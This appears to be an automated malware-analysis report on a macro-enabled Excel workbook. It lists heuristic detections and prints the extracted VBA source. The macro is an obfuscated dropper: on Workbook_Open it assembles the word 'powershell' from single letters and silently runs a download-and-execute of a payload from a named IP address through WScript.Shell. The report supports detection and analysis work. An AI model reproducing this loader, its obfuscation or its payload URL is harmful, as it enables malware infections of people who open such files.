MALICIOUS
238
Risk Score
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDF … -
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Workbook_Open() -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDF … -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
MsgBox msg, vbInformation, "NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL": End If: End If: Set PeddWtkZidGNptnk = Nothing: On Error GoTo CreateIconFile_ERR: Dim UUKtpchpNvXvwiuZfCQIssFbIFY As String: UUKtpchpNvXvwiuZfCQIssFbIFY = Environ("TEMP") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://45.14.226.221/cdfe/Fack1.jpg In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7940 bytes |
SHA-256: 5852e4b34ed54e55e7458785037032d9c9f3c7ddf125b93ec522cac01010a55b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' LdEKzWUzfEkXdSW Integer
Dim PeddWtkZidGNptnk As CommandBarControl: Set PeddWtkZidGNptnk = Nothing: With Application.CommandBars("List Range Popup"): With .Controls.Add(msoControlButton, 1, , 1, True): .Caption = "Pick &from Calendar": .OnAction = ThisWorkbook.Name & "!EkihSOt": .BeginGroup = True: .Tag = "ouwpOhFXCwOiIhXEMwo": End With: End With:
' tARzQTpyeuPVdAnnZyTDTpHiYheGChYWpZu
If Len(Trim(OQoLuIsdvXzVvFnSVDYBSZyCkurkTr)) Then
MsgBox "wkGdIuBCvKyANnXdApofUu" & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr, vbInformation
If coll.Count Then
ReDim EekWayRaNktAJiUFSUFkWbRYrz(0 To coll.Count - 1, 0 To 3): For i = 1 To coll.Count: LTUAsi = Split(coll(i), sep): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 0) = i: EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 1) = LTUAsi(1): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 2) = LTUAsi(0): EekWayRaNktAJiUFSUFkWbRYrz(i - 1, 3) = LTUAsi(2): Next i: SF.Caption = "rLSIWuUXGSsUyMfeLf """ & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr & """": SF.Show: SF.ListBox_Search.List = EekWayRaNktAJiUFSUFkWbRYrz: SF.TextBox_count.Text = coll.Count
Else: msg = "BtXHbX" & vbNewLine & _
"Heb """ & OQoLuIsdvXzVvFnSVDYBSZyCkurkTr & """ Heb «" & ActiveWorkbook.Name & "»"
MsgBox msg, vbInformation, "NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL": End If: End If: Set PeddWtkZidGNptnk = Nothing: On Error GoTo CreateIconFile_ERR: Dim UUKtpchpNvXvwiuZfCQIssFbIFY As String: UUKtpchpNvXvwiuZfCQIssFbIFY = Environ("TEMP")
If Len(UUKtpchpNvXvwiuZfCQIssFbIFY) > 0 Then
If Right(UUKtpchpNvXvwiuZfCQIssFbIFY, 1) <> "\" Or Right(UUKtpchpNvXvwiuZfCQIssFbIFY, 1) <> "/" Then
UUKtpchpNvXvwiuZfCQIssFbIFY = UUKtpchpNvXvwiuZfCQIssFbIFY & "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED"
Else: UUKtpchpNvXvwiuZfCQIssFbIFY = UUKtpchpNvXvwiuZfCQIssFbIFY & "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED": End If
Else: UUKtpchpNvXvwiuZfCQIssFbIFY = "CCAVsrEbfUiMpbMisvYeVNOaHWKCuGCDED": End If: sPathToIcon = UUKtpchpNvXvwiuZfCQIssFbIFY
CreateIconFile_ERR:
rerIfVCrYWBBFaDLSJAHWzSo = rerIfVCrYWBBFaDLSJAHWzSo + 1: Dim wzIXsSXIOVULOAdsAPiGRJ As Range: Dim dYVetWOHSFRVQzZoOXAbh As String, nFSHRfWiKUDv As String: dYVetWOHSFRVQzZoOXAbh = "wv": nFSHRfWiKUDv = "tENMpcLPDzriBMzeLJZBVQBsVZdNXJZM"
If dYVetWOHSFRVQzZoOXAbh <> nFSHRfWiKUDv Then
' FiNhLuoeJVJTHiBBZIQPoRVOXphTwNAVQBW
End If: MsgBox FRhafIKTrs + "HtHAXPrFNekweewNHGdpznInCRIauI" + BctGnnJLDSbrWtrI: Dim ekTRSopRaeHFBVzuQzQ, VTGXfPCURStJniBekhAIWU: GAS = "P": dVHVctCkwnJLDaTohSGiXYReuoMouhtt = "o": HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR = "w": srVsEAUeQBEQ = "e": SOLS = "r": iMtC = "s": ynwzkfEFyeDFnYBkUyIiSPo = "h": CGCQ = "e": NBHhekAf = "l": NprSGPIPVKZcOBXQrETuiVY = "l": VTGXfPCURStJniBekhAIWU = GAS + dVHVctCkwnJLDaTohSGiXYReuoMouhtt + HrtyVdvsOcDvWVXWeeaWcvbiWrCPVR + srVsEAUeQBEQ + SOLS + iMtC + ynwzkfEFyeDFnYBkUyIiSPo + CGCQ + NBHhekAf + NprSGPIPVKZcOBXQrETuiVY + " -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://45.14.226.221/cdfe/Fack1.jpg')""": Set ekTRSopRaeHFBVzuQzQ = CreateObject("WScript.Shell"): ekTRSopRaeHFBVzuQzQ.Run VTGXfPCURStJniBekhAIWU, 0: Dim uIfLGQWOkARAJJtAyTvzLhdHQnFSb As String ' GZyh: Dim VdAfSALaywBEiYzzQJwtDbIIAdeJASvV As Integer: ' FzVsAczLDWZraQsDAnks
For VdAfSALaywBEiYzzQJwtDbIIAdeJASvV = 1 To 10: uIfLGQWOkARAJJtAyTvzLhdHQnFSb = uIfLGQWOkARAJJtAyTvzLhdHQnFSb + CStr(VdAfSALaywBEiYzzQJwtDbIIAdeJASvV) ' VdAfSALaywBEiYzzQJwtDbIIAdeJASvV String
If VdAfSALaywBEiYzzQJwtDbIIAdeJASvV = 5 Then Exit For
Next VdAfSALaywBEiYzzQJwtDbIIAdeJASvV: uIfLGQWOkARAJJtAyTvzLhdHQnFSb = Val("yfJBhaHRIIeAANEdEAcFNsAaVZEcpvnBaMC") ' NOO:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = uIfLGQWOkARAJJtAyTvzLhdHQnFSb + 10:MsgBox uIfLGQWOkARAJJtAyTvzLhdHQnFSb:On Error Resume Next ' CbECwanFNWaoLreaDLyVruCakHV:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = 5 / 0
MsgBox uIfLGQWOkARAJJtAyTvzLhdHQnFSb
On Error Resume Next: Err.Clear
Set GAS = CreateObject("scripting.filesystemobject")
Set ekTRSopRaeHFBVzuQzQ = GAS.CreateTextFile(Filename, True)
KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv.Write txt: KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv.Close
SaveTXTfile = Err = 0
Set ekTRSopRaeHFBVzuQzQ = Nothing: Set fso = Nothing
On Error GoTo Err ' bFJJhhWbcCPwPQRfwykdtLnokcGXznycEiM Err:uIfLGQWOkARAJJtAyTvzLhdHQnFSb = 5 / 0:MsgBox "OK!"
Err:
MsgBox "KIUMbDzEvKGRHFBGPeSecwpanLdJCRCfDbA!": On Error GoTo 0 ' uDGPMAItikbKpufUrOpMrkbbniQkXOndpss:' KNdnvIWPKzcdWXYHkYyRSBQUicUAfPBWBUv
' LdEKzWUzfEkXdSW Integer
Do While True
Exit Do
Loop 'While True
Do 'Until False
Exit Do
Loop Until False
' EekWayRaNktAJiUFSUFkWbRYrz.
Dim OUJTGMyRkEERhUIIZRNbMzpnXukhYoWTyYF(1 To 10, 5 To 6) As Integer: OUJTGMyRkEERhUIIZRNbMzpnXukhYoWTyYF(1, 6) = 8: Dim NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf As New Collection: Dim ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR As Collection: NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf.Add "TbPtMDXMIPeEHBYistFdyNJZCRtAyNI", "ZsFkRMCtCBeFDkWJXYkGKZfGVsRi": Set ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR = NdCJHcrJIKspKwPNIISuPKbTPQaZQoWVkBf ' ZsFkRMCtCBeFDkWJXYkGKZfGVsRi Set:MsgBox ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR("ZsFkRMCtCBeFDkWJXYkGKZfGVsRi"):Set ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR = New Collection: MsgBox ZIveVrphMpcOwHAQYZevnZcOXhydkHbQhMR.Count
On Error Resume Next: Err.Clear
res = InputBox("DJyraUIn", "wrQFLnyBWwCNM")
If VarType(res) = vbBoolean Then Exit Sub ' DJyraUIn
Set ra = Range([A2], Range("A" & Rows.Count).End(xlUp))
Application.ScreenUpdating = False
ra.Font.Color = 0: ra.Font.Bold = 0
For Each cell In ra.Cells
pos = 1
If cell.Text Like "*" & txt & "*" Then
arr = Split(cell.Text, txt, , vbTextCompare)
If UBound(arr) > 0 Then
For Each v In arr
LTUAsi = LTUAsi + Len(v) ' RXbesASkoRPya
With cell.Characters(LTUAsi, Len(txt))
.Font.ColorIndex = 3 ' evJULbcbBeVOiOnbhQLiTrJUOydtSUFiIUB
.Font.Bold = True 'yFvKbH
End With
LTUAsi = LTUAsi + Len(txt)
Next v
End If
End If
Next cell: On Error Resume Next: Colors = Array(rLSIWuUXGSsUyMfeLf, BtXHbX, NQhFvnMeKnWbQZBQfBFMhokTaMXvPDfpeNL, OQoLuIsdvXzVvFnSVDYBSZyCkurkTr, uIfLGQWOkARAJJtAyTvzLhdHQnFSb, _
Heb): Err.Clear: Set rLSIWuUXGSsUyMfeLf = Intersect(Selection, ActiveSheet.UsedRange)
If Err Then Exit Sub: rLSIWuUXGSsUyMfeLf.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
For Each cell In ra.Cells: Err.Clear: If Len(Trim(cell)) Then coll.Add BtXHbX(cell.Value), BtXHbX(cell.Value): If Err Then dupes.Add BtXHbX(cell.Value), BtXHbX(cell.Value)
Next cell: For Each cell In ra.Cells
cell.Interior.Color = (CStr(cell.Value))
'uIfLGQWOkARAJJtAyTvzLhdHQnFSb EekWayRaNktAJiUFSUFkWbRYrz
Next cell
Application.ScreenUpdating = True
'uIfLGQWOkARAJJtAyTvzLhdHQnFSb
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{26E71FB2-54A3-43B6-BF30-E0E3DF57D658}{76A45B24-B05F-4383-95D9-0DA26BAC942F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 25088 bytes |
SHA-256: a464b30b8669ce195cf29ac75c14d5b3e32122242d139df4c2bf5c3ffc6ebcce |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.